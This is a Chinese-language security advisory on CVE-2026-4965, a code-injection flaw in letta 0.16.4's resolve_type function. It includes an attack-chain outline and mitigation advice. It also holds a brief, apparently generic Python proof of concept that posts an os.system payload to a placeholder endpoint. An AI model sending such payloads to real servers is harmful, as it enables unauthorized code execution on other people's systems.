CVE-2026-4965 CVSS 7.3 高危

CVE-2026-4965 letta-ai letta 远程代码执行漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4965

漏洞类型

远程代码执行

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

letta-ai letta

漏洞概述

letta-ai letta 0.16.4版本存在安全漏洞，源于组件Incomplete Fix CVE-2025-6101中文件letta/functions/ast_parsers.py的resolve_type函数。该漏洞导致动态评估代码中指令未能正确中和，攻击者可远程发起攻击并执行恶意代码。目前利用代码已公开，厂商尚未回应。

技术细节

该漏洞位于letta-ai letta 0.16.4版本中的`letta/functions/ast_parsers.py`文件的`resolve_type`函数。此问题被标记为对CVE-2025-6101的不完整修复，意味着之前的补丁未能完全解决代码注入风险。漏洞核心在于应用程序在处理动态代码评估时，未能正确中和特定的指令或输入。攻击者无需认证即可构造恶意数据包，利用该函数在解析AST（抽象语法树）或执行动态求值时的逻辑缺陷，注入并执行任意Python代码。由于缺乏足够的输入过滤和沙箱隔离，攻击者可绕过安全检查，导致系统机密性、完整性和可用性受损。当前漏洞利用代码已在互联网公开，风险极高。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行了存在漏洞的letta-ai letta 0.16.4版本。

STEP 2

武器化

攻击者构造包含恶意Python代码的特制数据包，该代码旨在利用resolve_type函数中的动态评估缺陷。

STEP 3

交付

攻击者通过无需认证的网络接口，将恶意数据包发送至目标服务器的受影响端点。

STEP 4

利用

目标服务器在处理请求时，resolve_type函数未能正确中和指令，导致恶意代码被动态解析并执行。

STEP 5

影响

攻击者成功在服务器上执行任意代码，获取系统部分控制权，造成数据泄露或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-host:port/api/endpoint"

# Malicious payload targeting the resolve_type function
# Exploiting improper neutralization in dynamically evaluated code
payload = {
    "type_input": "__import__('os').system('whoami')"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Response:", response.text)
    else:
        print("[-] Failed to send payload.")
        print("[-] Status Code:", response.status_code)

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

letta-ai letta 0.16.4

防御指南

临时缓解措施

建议立即检查并升级letta-ai letta组件。如果无法立即升级，应通过WAF（Web应用防火墙）部署规则，拦截包含特定恶意代码特征的请求。此外，应暂时禁用受影响的resolve_type相关功能接口，或对输入参数实施严格的白名单过滤机制，直至应用补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4965
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4965
3 Details https://www.cvedetails.com/cve/CVE-2026-4965/
4 VulDB https://vuldb.com/cve/CVE-2026-4965
5 Link https://gist.github.com/YLChen-007/fc09bc447a73bba526c1642d9ce73ca5
6 Link https://vuldb.com/?ctiid.353842
7 Link https://vuldb.com/?id.353842
8 Link https://vuldb.com/?submit.777654

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表